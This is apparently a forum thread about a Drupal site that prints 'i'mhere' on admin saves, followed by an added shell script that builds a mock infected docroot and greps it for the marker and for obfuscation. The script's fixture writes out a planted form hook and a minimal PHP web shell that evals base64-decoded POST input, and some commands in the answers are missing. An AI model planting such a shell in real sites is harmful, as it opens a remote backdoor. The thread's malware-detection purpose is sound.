Help resolving a potential trojan problem on a website
So I'm pretty sure my site's been infected with some kind of trojan or virus that attached itself to the scripting within the site. Every time I try to update my Drupal-based site, I get a white screen with this stupid "i'mhere" message. Upon reload, the changes will take effect, but I don't know what this is doing once changes are saved. This only pops up while administering the site, i.e. posting new content, activating/deactivating modules etc.
Problem is, I haven't the faintest idea how or where to go to remove this. The source code doesn't make reference to any malicious code. It isn't the iFrame link kind of trojan that I've seen brought up while trying to find an answer to this problem.
Things I've tried:
- Scanned computer multiple times for viruses (supposedly these things attack insecure FTP data and hijack your client to upload malicious code)
- Changed FTP credentials
- Changed admin user passwords to the backend of the site (Drupal login)
- Updated Drupal
Nothing's worked so far and I'm at my wit's end trying to figure this out. Any tips in the right direction would be greatly appreciated.
Comments (2)
Assuming the problem is really Drupal, first check to see if there's some code in a module somewhere firing during a form submit. If you have shell access and it's a Unix/Linux/etc.-based server, navigate to the Drupal directory and run:
This will tell you if it exists in code and what file contains it. If it's a module (likely), disable it and either see if there's an update or modify it yourself.
If it's not in code, check your database. Create a dump of your database, and run:
Where databasedump.sql is the name of the database dump you just created. This should at least give you a general idea of what table the data exists in. Then, you can decide how you want to proceed: restore from a previous backup, delete the offending data, etc.
If it's not in either, it might be local. Check with others to see if it's occurring for them.
If it's not local, you've got something really nasty and hopefully someone else has some other ideas on what you can check. :)
Here is a list of potentially useful tools which can help you alleviate, reduce or prevent a virus infection:
It comes straight out of an infamous piece of backdoor malware, described in this stackoverflow article.
You may want to manually search for other instances of the virus by running this simple command:
[~] grep -r "base64_decode" .
as suggested in this RAT infection article on thegothicparty.com:
http://thegothicparty.com/dev/article/server-side-virus-rat/
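As an added example (not code from the question or from either answer), the POSIX shell script below builds a small constructed mock of a Drupal docroot plus a mysqldump-style SQL file, then runs the checks the two answers describe: the recursive search for the literal "i'mhere" marker in code, the search of the database dump with a report of which table holds the string, and the base64_decode/eval sweep from the second answer. The module name example_mod, every file name and every file body are invented for the demo.

```shell
#!/bin/sh
# Added example, not code from the original question or either answer.
# Builds a constructed mock Drupal docroot and SQL dump, then runs:
#   1. a search for the literal "i'mhere" marker in code and in the dump
#      (reporting the table the string lives in);
#   2. a sweep of PHP files for base64_decode/eval-style obfuscation.
# All paths, module names and file contents below are invented.
set -eu

MARKER="i'mhere"

# Create the fixture (assumed layout); prints the directory it lives in.
make_fixture() {
  root=$(mktemp -d)
  mkdir -p "$root/webroot/sites/all/modules/example_mod" \
           "$root/webroot/sites/default/files/images"

  # Clean module code.
  cat > "$root/webroot/sites/all/modules/example_mod/example_mod.module" <<'EOF'
<?php
function example_mod_menu() {
  return array();
}
EOF

  # Planted hook: adds an extra submit handler to every form and prints the marker.
  cat > "$root/webroot/sites/all/modules/example_mod/example_mod.hook.inc" <<'EOF'
<?php
function example_mod_form_alter(&$form, &$form_state, $form_id) {
  $form['#submit'][] = 'example_mod_hidden_submit';
}
function example_mod_hidden_submit($form, &$form_state) {
  print "i'mhere";
  exit;
}
EOF

  # Obfuscated dropper hiding in the uploads directory (no marker in it).
  cat > "$root/webroot/sites/default/files/images/cache.php" <<'EOF'
<?php
$p = base64_decode($_POST['x']);
eval($p);
EOF

  # Dump with the marker in a serialized variable; note mysqldump escapes ' as \'.
  cat > "$root/databasedump.sql" <<'EOF'
INSERT INTO `variable` VALUES ('site_name','s:6:\"Mysite\";');
INSERT INTO `variable` VALUES ('site_mail_tag','s:7:\"i\'mhere\";');
INSERT INTO `node` VALUES (1,'page','Welcome',1);
EOF
  printf '%s\n' "$root"
}

# List files under $1 containing the fixed string $2 (grep exit 1 = no match, not an error).
find_marker_in_code() {
  grep -rlF -- "$2" "$1" || [ $? -eq 1 ]
}

# Print the tables whose INSERT lines in dump $1 contain fixed string $2.
# Backslashes are stripped first so escaped quotes (\') match the raw string.
find_marker_in_dump() {
  tr -d '\\' < "$1" | grep -F -- "$2" \
    | sed -n 's/^INSERT INTO `\([^`]*\)`.*/\1/p' | sort -u
}

# List PHP-type files under $1 that call common obfuscation/eval primitives.
find_obfuscation() {
  pattern='(base64_decode|gzinflate|str_rot13|eval)[[:space:]]*\('
  find "$1" -type f \( -name '*.php' -o -name '*.inc' -o -name '*.module' \) \
    -exec grep -lE "$pattern" {} + || [ $? -eq 1 ]
}

main() {
  root=$(make_fixture)
  echo "== files under webroot containing $MARKER"
  find_marker_in_code "$root/webroot" "$MARKER"
  echo "== tables in databasedump.sql containing $MARKER"
  find_marker_in_dump "$root/databasedump.sql" "$MARKER"
  echo "== files with base64_decode/eval-style obfuscation"
  find_obfuscation "$root/webroot"
  rm -rf "$root"
}
main
```

Two caveats when running this against a real site: a mysqldump escapes single quotes, so a plain grep of the dump for a string containing an apostrophe can miss it, which is why the script strips backslashes before matching; and base64_decode and eval also appear in legitimate Drupal core and contrib code, so every hit from the sweep needs to be read, and the safe remedy for a confirmed hit is to replace the file from a known-good copy rather than to edit it in place.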